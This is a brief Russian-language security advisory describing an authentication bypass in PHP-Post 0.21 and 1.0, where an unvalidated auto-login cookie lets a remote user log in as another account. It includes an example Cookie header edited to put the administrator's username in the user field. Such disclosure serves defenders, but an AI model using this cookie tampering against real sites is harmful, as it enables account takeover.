• Партнер

  • Программа: PHP-Post 0.21 и 1.0, возможно другие
    версии.

    Уязвимость позволяет удаленному
    пользователю обойти некоторые ограничения
    безопасности. Уязвимость существует из-за
    недостаточной проверки данных при
    включенной функции автоматического входа.
    Удаленный пользователь может изменить
    некоторые данные в файле куки и
    авторизоваться в качестве другого
    пользователя (например, администратора) в
    приложении.

    Пример:

    Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0;
    logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

    изменить на:

    Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S
    USERNAME"; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284;
    post[329]=330

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии